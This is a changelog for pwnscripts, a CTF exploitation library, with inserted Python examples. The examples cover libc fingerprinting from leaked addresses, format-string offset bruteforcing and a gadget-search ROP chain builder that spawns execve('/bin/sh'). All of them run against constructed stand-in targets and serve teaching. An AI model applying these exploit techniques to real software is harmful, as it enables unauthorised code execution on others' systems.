Pwnscripts

Latest version: v0.6.0


Page 1 of 2

**20-08.1**

NEW: printf() functions are now kept under the `pwnscripts.fsb` module. The older `find_printf_*` prototypes remain available for now.

Added many docstrings, plus example binaries.

**20-08**

Added a lot of whitespace.

Added a wrapper object for libc-database: `libc_db`. This is mostly a reinvention of tools like `LibcSearcher`, although I have yet to see another project tack on `one_gadget` searching, which is a (hacky) feature added to `libc_db`.

Minor adjustments to *printf*: logging is now suppressed during offset bruteforcing, and there is a new helper for building a leak payload.

Extended readme.

**20-06**

Added module packaging, so that `pip install -e .` works.

You can now see a test example of this library in `test.py`.

0.6.0

Changes
Most changes are listed under the v0.5.*dev headers. Other changes include:
* updating the README.md to match many new features
* automated tests have been cleaned up & categorised

0.5.2dev

Changes
New
* Assigning values to `ELF.symbols[]` will automagically update `ELF.address`.
  * Note: as with prior ELF/context updates, the magic here can't sync with internal pwntools methods that reference `pwnlib.elf.elf.ELF`.
  * Tests have been updated to reflect this.
* `fsb-cache` will automatically detect different libc versions && differentiate remote vs. local bruteforce attempts.
* `context.is_local` to check if the most recently opened tube is local/remote. This involves monkeypatching for `ELF()` and `remote()`; there are a number of cases where `.is_local` will fail to update properly.
Internal changes
* `libc()` will now catch discrepancies between pwntools-provided binary offsets and libc-database offsets, logging at debug level when the two disagree.
* increase the number of TODOs
* pylint whitespace
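Worked example, added here rather than taken from pwnscripts or pwntools: libc-database-style fingerprinting from leaked addresses, the "assign a leak to a symbol and the base updates" behaviour described above, and the kind of offset-discrepancy check that `libc()` is described as doing. `FAKE_LIBC_DB` holds constructed offsets (not real libc builds), `BASE` is an assumed load address, and `RebasableLibc`/`_SymbolView` are a toy model of the ELF object, not its implementation.

```python
"""Added example: fingerprinting a libc from leaked addresses and rebasing its symbols.

Written for this page as an illustration; it is not pwnscripts' libc_db/libc() code
and not pwntools' ELF. FAKE_LIBC_DB holds constructed offsets, not real libc builds,
and BASE below is an assumed load address. The matching rule is libc-database's:
mappings are page-aligned, so the low 12 bits of a leaked address equal the low 12
bits of that symbol's offset inside the library, whatever ASLR chose for the base.
"""

PAGE_MASK = 0xFFF

# Constructed entries in the shape of a libc-database dump: id -> symbol -> offset.
FAKE_LIBC_DB = {
    "libc-a": {"puts": 0x80ED0, "__libc_start_main": 0x26FC0,
               "system": 0x55410, "str_bin_sh": 0x1B75AA},
    "libc-b": {"puts": 0x84450, "__libc_start_main": 0x23A90,
               "system": 0x52290, "str_bin_sh": 0x1B45BD},
    "libc-c": {"puts": 0x80ED0, "__libc_start_main": 0x28F40,  # same puts page offset as libc-a
               "system": 0x55420, "str_bin_sh": 0x1B85AA},
}


def match_libc(leaks, db=FAKE_LIBC_DB):
    """Return the ids of every candidate whose page offsets agree with all leaks."""
    hits = []
    for libc_id, offsets in db.items():
        if all(sym in offsets and (offsets[sym] & PAGE_MASK) == (addr & PAGE_MASK)
               for sym, addr in leaks.items()):
            hits.append(libc_id)
    return hits


def offset_discrepancies(elf_offsets, db_offsets):
    """Symbols whose offset from the local ELF parse differs from the database's.

    A non-empty result means the local libc.so.6 is not the build the database
    thinks it is (or one of the two sources is stale): treat derived addresses
    with suspicion.
    """
    return sorted(sym for sym in elf_offsets
                  if sym in db_offsets and elf_offsets[sym] != db_offsets[sym])


class _SymbolView:
    """symbols[name] reads a rebased address; symbols[name] = leak re-derives the base."""

    def __init__(self, image):
        self._image = image

    def __getitem__(self, name):
        return self._image.address + self._image.offsets[name]

    def __setitem__(self, name, leaked_address):
        base = leaked_address - self._image.offsets[name]
        if base & PAGE_MASK:
            # The library is page-mapped, so a misaligned base means the leak or the
            # offset is wrong, and every address derived from it would be too.
            raise ValueError("base 0x%x is not page-aligned: wrong libc or bad leak" % base)
        self._image.address = base


class RebasableLibc:
    """Minimal model of 'assigning to ELF.symbols[] updates ELF.address'."""

    def __init__(self, libc_id, offsets):
        self.libc_id = libc_id
        self.offsets = dict(offsets)
        self.address = 0
        self.symbols = _SymbolView(self)


def resolve(leaks, db=FAKE_LIBC_DB):
    """Identify the libc from leaks, rebase it, and return (id, base, system, "/bin/sh")."""
    hits = match_libc(leaks, db)
    if len(hits) != 1:
        raise LookupError("expected one candidate, got %r; leak another symbol" % hits)
    libc = RebasableLibc(hits[0], db[hits[0]])
    sym, addr = next(iter(leaks.items()))  # any one leak fixes the base
    libc.symbols[sym] = addr
    return libc.libc_id, libc.address, libc.symbols["system"], libc.symbols["str_bin_sh"]


if __name__ == "__main__":
    BASE = 0x7FFFF7D80000  # assumed ASLR base for the demo
    leaks = {"puts": BASE + 0x80ED0}
    print("one leak, candidates:", match_libc(leaks))
    leaks["__libc_start_main"] = BASE + 0x26FC0
    print("two leaks, resolved:", [hex(x) if isinstance(x, int) else x for x in resolve(leaks)])
```

One leak is often ambiguous (two of the constructed entries share the page offset of `puts`), which is why the resolver insists on a single candidate before rebasing; the page-alignment check in `__setitem__` catches the other common failure, a leak that is not actually the symbol you think it is.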

0.5.1dev

Changes
New
* `fsb.find_offset.<>()` will store a **cache** of leaked printf values.
  * Use `fsb.find_offset.flush_cache()` if anything goes wrong.
  * `README.md` has been updated appropriately.
* `libc.run_with()` now has an argument for overriding the process constructor.
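Worked example, added here and not part of pwnscripts: a simulation of what an offset bruteforce like `fsb.find_offset` has to do for a format-string bug, with a result cache keyed by target and by local/remote (the distinction the 0.5.2dev entry describes) and a `flush_cache()` escape hatch for when a cached offset has gone stale. `FakePrintfTarget`, its stack layout, the `(target_id, is_local)` cache key and every value in it are constructed for the demo.

```python
"""Added example: bruteforcing a printf argument offset and caching the result.

This is a self-contained simulation written for this page, not pwnscripts' own
fsb.find_offset code. The target, its stack layout and the cache key scheme are
constructed assumptions; the technique is the usual one: send MARKER + "%N$p"
for increasing N until the marker's bytes come back as the printed pointer.
"""
import re
import struct

MARKER = b"AAAAAAAA"  # exactly one 64-bit stack slot
MARKER_HEX = b"0x%x" % struct.unpack("<Q", MARKER)[0]  # b"0x4141414141414141"


class FakePrintfTarget:
    """Constructed stand-in for a binary that calls printf(user_input).

    On x86-64 SysV the first five '%N$p' conversions read argument registers and
    '%6$p' onward reads 8-byte stack slots; here everything below the user buffer
    is filler and the buffer starts at argument index `buf_index`.
    """

    def __init__(self, buf_index):
        self.buf_index = buf_index

    def _argument_slots(self, payload):
        slots = [0xDEADBEEF] * (self.buf_index - 1)  # constructed filler values
        buf = payload + b"\x00" * (-len(payload) % 8)  # pad to a slot boundary
        slots += [struct.unpack("<Q", buf[i:i + 8])[0] for i in range(0, len(buf), 8)]
        return slots

    def run(self, payload):
        """Return what printf would emit for the '%N$p' conversions in payload."""
        slots = self._argument_slots(payload)

        def expand(m):
            n = int(m.group(1))
            value = slots[n - 1] if 0 < n <= len(slots) else 0
            return b"(nil)" if value == 0 else b"0x%x" % value  # glibc prints NULL as (nil)

        return re.sub(rb"%(\d+)\$p", expand, payload)


# (target id, is_local) -> discovered offset. Keying per target and per local/remote
# mirrors the distinction the changelog describes; the exact key is an assumption.
_offset_cache = {}


def flush_cache():
    """Drop every cached offset; use when a cached value no longer verifies."""
    _offset_cache.clear()


def verify_offset(target, offset):
    """Re-check one candidate instead of re-running the whole bruteforce."""
    return MARKER_HEX in target.run(MARKER + b"%%%d$p" % offset)


def find_buffer_offset(target, target_id, is_local, max_offset=64):
    """Return the smallest N for which '%N$p' prints the marker placed in the buffer."""
    key = (target_id, is_local)
    if key in _offset_cache:
        return _offset_cache[key]
    for n in range(1, max_offset + 1):
        if verify_offset(target, n):
            _offset_cache[key] = n
            return n
    raise ValueError("marker not found in the first %d printf arguments" % max_offset)


if __name__ == "__main__":
    local = FakePrintfTarget(buf_index=6)
    print("offset:", find_buffer_offset(local, "chal", is_local=True))
    # A stale cache entry is the failure mode flush_cache() exists for.
    changed = FakePrintfTarget(buf_index=8)
    if not verify_offset(changed, find_buffer_offset(changed, "chal", is_local=True)):
        flush_cache()
        print("re-found offset:", find_buffer_offset(changed, "chal", is_local=True))
```

In a real target the user buffer rarely starts exactly on an 8-byte argument slot, so the marker is usually preceded by padding and the bruteforce has to tolerate the marker straddling two `%N$p` outputs; the simulation places the buffer slot-aligned to keep the matching rule simple. Any change in the libc or the binary shifts the stack layout, which is why the cache is keyed per target and why the first step after a surprising result should be `flush_cache()`.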

Internal changes
* `__all__` has been added to most source files to prevent namespace leaking.
* Version history has been shifted to its [own separate file](CHANGELOG.md)
* Efforts have been made to clean up code using pylint

0.5.0

Changes
* `string_checks` has been refactored:
  * `string_checks` itself is now named `util`
  * `is_X_address` functions have been renamed to `is_addr.X`
  * `extract_*` functions have been renamed to `unpack_*`
* `libc_db()` from v0.1 is now fully removed from pwnscripts.
* bugfixes for the `fsb.leak` module

0.4.0

Changes
New
* `ROP.pop` && `ROP.system_call` overhaul
  * Use `ROP.pop.<reg>(value)` to pop a single register ASAP
  * `ROP.system_call.<func>(args)` is a similar shortcut
  * `ROP.system_call(id, ...)` will now accept a `str` for `id` (where `id` is the name of the syscall)
  * These changes mean that `help()` is essentially broken for these functions. In lieu of that, more docstrings!
  * Added a test for these changes
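Worked example, added here and not pwnscripts' or pwntools' ROP code: a byte-level gadget search over a constructed `.text` blob and a chain builder whose `pop(reg, value)` and `system_call(name_or_number, *args)` do the job that shortcuts of the form `ROP.pop.<reg>(value)` and `ROP.system_call.<func>(args)` are described as doing. `FAKE_TEXT`, `FAKE_BASE` and `BIN_SH` are assumptions; the opcode bytes and syscall numbers are the real x86-64 Linux ones.

```python
"""Added example: finding pop-register gadgets and assembling a named-syscall ROP chain.

Written for this page to show what ROP.pop.<reg>(value) / ROP.system_call.<name>(args)
style shortcuts have to do underneath; it is not pwnscripts' or pwntools' ROP code.
FAKE_TEXT is a constructed byte blob standing in for a binary's .text, and
FAKE_BASE / BIN_SH are assumed addresses. The encodings are real x86-64: single-byte
`pop reg` (0x58..0x5f), `ret` (0xc3) and `syscall` (0x0f 0x05); the syscall numbers
are the real x86-64 Linux ones.
"""
import struct

POP_OPCODE = {"rax": 0x58, "rcx": 0x59, "rdx": 0x5A, "rbx": 0x5B,
              "rsp": 0x5C, "rbp": 0x5D, "rsi": 0x5E, "rdi": 0x5F}
RET = b"\xc3"
SYSCALL = b"\x0f\x05"
SYSCALL_NUMBER = {"read": 0, "write": 1, "open": 2, "execve": 59, "exit": 60}
SYSCALL_ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")  # SysV syscall ABI order

# Constructed ".text": some filler plus the gadgets the chain below needs.
FAKE_TEXT = (b"\x48\x89\xe5"    # mov rbp, rsp (filler)
             + b"\x5f\xc3"      # pop rdi; ret
             + b"\x90\x90"      # nop; nop
             + b"\x5e\xc3"      # pop rsi; ret
             + b"\x5a\xc3"      # pop rdx; ret
             + b"\x58\xc3"      # pop rax; ret
             + b"\x0f\x05\xc3"  # syscall; ret
             + b"\xc3")
FAKE_BASE = 0x400000  # assumed load address of a non-PIE binary
BIN_SH = 0x404000     # assumed address of a "/bin/sh\0" string in the binary


def find_gadgets(text, base):
    """Map gadget names to addresses by raw byte search.

    Searching bytes rather than decoded instructions is deliberate: x86 has no
    instruction alignment, so a 0x5f 0xc3 pair that sits inside a longer
    instruction is just as usable as an intended `pop rdi; ret`.
    """
    gadgets = {}
    for reg, opcode in POP_OPCODE.items():
        i = text.find(bytes([opcode]) + RET)
        if i != -1:
            gadgets["pop " + reg] = base + i
    i = text.find(SYSCALL + RET)
    if i != -1:
        gadgets["syscall"] = base + i
    return gadgets


class RopChain:
    """Accumulates gadget addresses and popped values as a list of qwords."""

    def __init__(self, gadgets):
        self.gadgets = gadgets
        self.chain = []

    def pop(self, reg, value):
        """Emit 'pop <reg>; ret' followed by the value it will pop (the pop.<reg> idea)."""
        try:
            gadget = self.gadgets["pop " + reg]
        except KeyError:
            raise KeyError("no 'pop %s; ret' gadget in this binary" % reg) from None
        self.chain += [gadget, value]
        return self

    def system_call(self, number_or_name, *args):
        """Load rax and the argument registers, then transfer to 'syscall; ret'."""
        if isinstance(number_or_name, str):
            number = SYSCALL_NUMBER[number_or_name]
        else:
            number = number_or_name
        if len(args) > len(SYSCALL_ARG_REGS):
            raise ValueError("a syscall takes at most 6 arguments")
        self.pop("rax", number)
        for reg, value in zip(SYSCALL_ARG_REGS, args):
            self.pop(reg, value)
        self.chain.append(self.gadgets["syscall"])
        return self

    def build(self):
        """Serialize the chain as little-endian qwords, ready to overwrite a saved rip."""
        return b"".join(struct.pack("<Q", v) for v in self.chain)


def execve_chain(text=FAKE_TEXT, base=FAKE_BASE, bin_sh=BIN_SH):
    """execve("/bin/sh", NULL, NULL) as a chain over the gadgets found in text."""
    rop = RopChain(find_gadgets(text, base))
    return rop.system_call("execve", bin_sh, 0, 0)


if __name__ == "__main__":
    rop = execve_chain()
    for value in rop.chain:
        print("0x%016x" % value)
    print(len(rop.build()), "bytes")
```

Only the single-byte `pop` encodings are searched, so registers that need a REX prefix (`r8` to `r15`) are reported missing and a call with a fourth argument fails loudly on `pop r10` rather than emitting a broken chain; a real gadget finder extends the table with the two-byte `41 5x` forms.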
Internal changes
* Some of the TODOs have been extended with short outlines


© 2024 Safety CLI Cybersecurity Inc. All Rights Reserved.